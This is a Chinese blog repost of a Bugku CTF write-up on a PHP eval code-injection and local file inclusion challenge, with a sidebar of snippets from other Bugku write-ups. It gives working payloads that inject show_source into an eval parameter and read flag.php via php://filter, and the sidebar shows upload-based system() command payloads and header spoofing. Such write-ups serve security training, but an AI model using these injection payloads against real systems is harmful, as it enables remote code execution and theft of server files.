BugkuWeb本地包含

最新推荐文章于 2021-06-21 21:07:55 发布
最新推荐文章于 2021-06-21 21:07:55 发布
阅读量137 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/liqik/p/10561579.html
版权

知识点:$_REQUEST不是一个函数,它是一个超全局变量,里面包括有$_GET $_POST $_COOKIE的值,$_REPUEST 是接收了 $_GET $_POST $_COOKIE 三个的集合

 

题目中的 地址已经不行了

所以这是转自https://blog.csdn.net/dyw_666666/article/details/82389457#comments,感谢分享

 



 

 

方法一:eval存在命令执行漏洞,使用hello构造payload

http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3

 

 

方法二:

1.http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//
2.在POST区域:f=php://filter/convert.base64-encode/resource=flag.php

 

Base64解码即可。

 

 

方法三:直接将flag.php文件读入变量hello中

1.?hello=get_file_contents('flag.php')
2.?hello=file('flag.php')



 



 

转载于:https://www.cnblogs.com/liqik/p/10561579.html

weixin_30609287
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku web34 hint:文件包含
濯君
12-30 578
首先打开实验场景,发现什么也没有 查看源码,发现upload.php 进入该上传页面 <script language=php>system("find / -name flag*");</script> 将上面的代码写入文本,文本名修改为2.jpg 将2.jpg上传到服务器 浏览器访问URL http://114.67.246.176:17269/index.php?file=upload/202012301028412794.jpg 找到/flag,访问URL h.
bugku Web write up 一
0verWatch的博客
02-14 2740
web2 view-source:查看源码即可 文件上传测试 上传一个PHP文件发现他要的是图片文件,抓包先改一下content-type为image/jpeg,Go一下发现flag 计算器 F12调出开发者工具,把maxlength改为更长的长度即可 web基础$_GET 完全就是考php基础,直接URL加上index.php?what=flag即可 web基...
NodeJS遍历文件生产文件列表
a560694091的博客
11-15 195
本文实例讲述了NodeJS遍历文件生产文件列表功能。分享给大家供大家参考,具体如下: 功能需求:在工作中我们可能经常需要知道项目中静态文件列表发布,一个一个去检索写,那就太苦逼了。 要想知道里面的文件列表是不是很蛋疼,可能我们也会有dos tree去获取。 这里分享一下,通过node,知道文件路径,并配置远程路径,直接copy,发布。 新建filelist.js 里面都有注释...
bugku web 文件包含
cuddlylm的博客
06-21 206
打开题目 屠龙宝刀,点击就送 点击获得题目线索 这里没有思路先扫描一下康康 都试一下,但最终都会来到这个界面url 再看看哪里是我们能用的,这题叫文件上传,但是没有文件上传的入口,就考虑一下用什么方法可以传递参数flag 伪协议漏洞 我们先试一下php://input 注意:input需要allow_url_include:On,在input中POST提交的数据都会被当作php代码处理 彳亍口巴 那么试一下利用php://filter协议来查看源文件内容 这个协议相当于一个文件过滤器,可以利用它来读取
bugku-Web 文件包含2
Sea_Sand息禅
12-15 518
打开网页查看源代码,在最上面发现upload.php,于是我们就访问这个文件:http://123.206.31.85:49166/index.php?file=upload.php 发现是让我们上传文件,然而,我们上传了并没什么用,但是下面说出了文件的位置。 这里我们构造一个文件再上传 创建一个文本文件并输入:<script language=php>system("ls")&...
Bugkuweb 文件包含2
qq_26961571的博客
09-10 279
打开这道题,到了文件包含时刻! ​ 打开链接看看 什么都没有啊,看看源代码 只有在第一行有提示,upload.php界面,看来需要进去看看了。 果不其然 需要上传文件,我们乖乖听话的话会怎么样呢?随便上传一个 然后呢?? 就是一个普通的图像,那么只有借助网络的力量,看看怎么做了。 网上大神说 <script language=php>system("ls")</script> 这句话保存为jpg格式上传就可以,是图...
bugku-web12-本地管理员
weixin_50774579的博客
05-24 1456
1.查看源代码发现了线索,base64解码得到字符串‘test123' 2.管理员默认账号admin,密码test123,登录,提示IP禁止访问,请联系本地管理员登陆,IP已被记录. burp拦截,发到repeater, 添加http头X-Forwarded-For: 127.0.0.1,即可 也可以用hackbar直接在浏览器上完成,这个比较简单。 要注意!X-Forwarded-For: 127.0.0.1(IP前面要有一个空格) base64解码+XFF伪造请求头 知识点:以...
bugku web方向所有题解
kekefen01的博客
04-18 3112
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
BugkuCTF-WEB-本地包含
Jaychouzzk
11-15 536
题目提示,需要将flag.php包含进去才可以得到flag 百度了一下$_REQUEST函数,发现易存在sql漏洞和变量漏洞覆盖 第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将变量a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式) SO——   (1)a变量由$_REQU...
bugkuWeb小白解法---持续更新!
qq_42906381的博客
03-30 688
bugkuWeb!安排本文持续更新1滑稽一脸2验证码3请求get4请求post5矛盾 本文持续更新 这是我第二次使用 Markdown编辑器 。我将用他来写出自己的第一篇CSDN博客! 1滑稽一脸 打开网页之后,按下F12进入开发人员工具 点击调试程序,手慢的我已经让滑稽停不下来了 但是不经意间看见有个播放键,点一下,滑稽停了下来 舒服多了 然后搜索flag找到key复制 2验证码 打开网页 F...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku web3
xiaoqi199915的博客
06-05 193
bugku web3 75 69 89 对应flag Python编写一个脚本 就可以得到flag
bugku web web3
weixin_30576859的博客
02-20 240
flag就在这里快来找找吧http://123.206.87.240:8002/web3/ 点进去这个页面可以看到不断地有提示 flag就在这里 来找找吧 那就找一找哇 在source中可以找到一行注释 &#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&amp...
bugku——web3
吃肉唐僧的博客
09-02 198
打开题目,不提示弹窗 火狐关掉js,f12查看源码 发现一串字符 拿去编码网站,随便转 unicode 转 ascll 有发现 补一下},成功
bugku-web-web3
a3uRa的一个窝
08-23 1073
打开页面 不断弹窗ctrl+u查看源代码 最后面发现 &lt;!--&amp;#75;&amp;#69;&amp;#89;&amp;#123;&amp;#74;&amp;#50;&amp;#115;&amp;#97;&amp;#52;&amp;#50;&amp;#97;&amp;#104;&amp;#74;&amp;#75;&amp;#45;&amp;#72;&a
Bugkuweb web3
qq_26961571的博客
04-29 479
打开这道题,珍惜这段缘。 这是一道不停弹出框框题目,点击之后发现框框一直无法停止,所以... 必须停止这妖孽!! 利用360浏览器,(因为chrome实在找不到停止的地方,我菜),点了两下360浏览器说:喂,不要让他这样做 自然是要让他借坡下驴啦~ 停止之后一片空白,打开源代码查看。 哦吼,这不就是传说中的fla...
bugku web4
qian_lanse的博客
11-13 227
http://123.206.87.240:8002/web4/ 点进去看, 我们随便输入一个数, 错别字啊,看来出题人语文水平一般。 既然提示你查看源代码了,我们右键查看源代码。 很明显,这是url编码。 下面说一下url编码规则: 1将空格转换为加号(+) 2对0-9,a-z,A-Z之间的字符保持不变 3 对于所有其他的字符,用这个字符的当前字符集编码在内存中的十六进制格式表示,并在每个字...
Bugkuweb web4
qq_26961571的博客
06-23 585
这道题没什么提示,就是让你看看源代码。我是谁,我当然知道要看啦!! 打开网址之后。 遇事不决先鼓捣,按了一下Submit就出现了让我“在好好看看”。 这个应该是“再”吧??“在”???我心中不免疑惑,难道说这里面也另有玄机? 打开源代码。 哇,一串的URL编码字符,我觉得肯定要先转换。 所以心急火燎打开在线转换。 哇,马上识破了套路。 p1 = function checkSubmit(){var a=docume...
bugku文件包含2
最新发布
09-25
bugku中,文件包含的方法主要有两种。 首先,可以通过上传文件并抓包的方式来实现文件包含。通过修改参数content-type为image/jpeg filename="1.php:.jpg",可以获取到文件路径。 然后,访问返回的路径,可以看到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值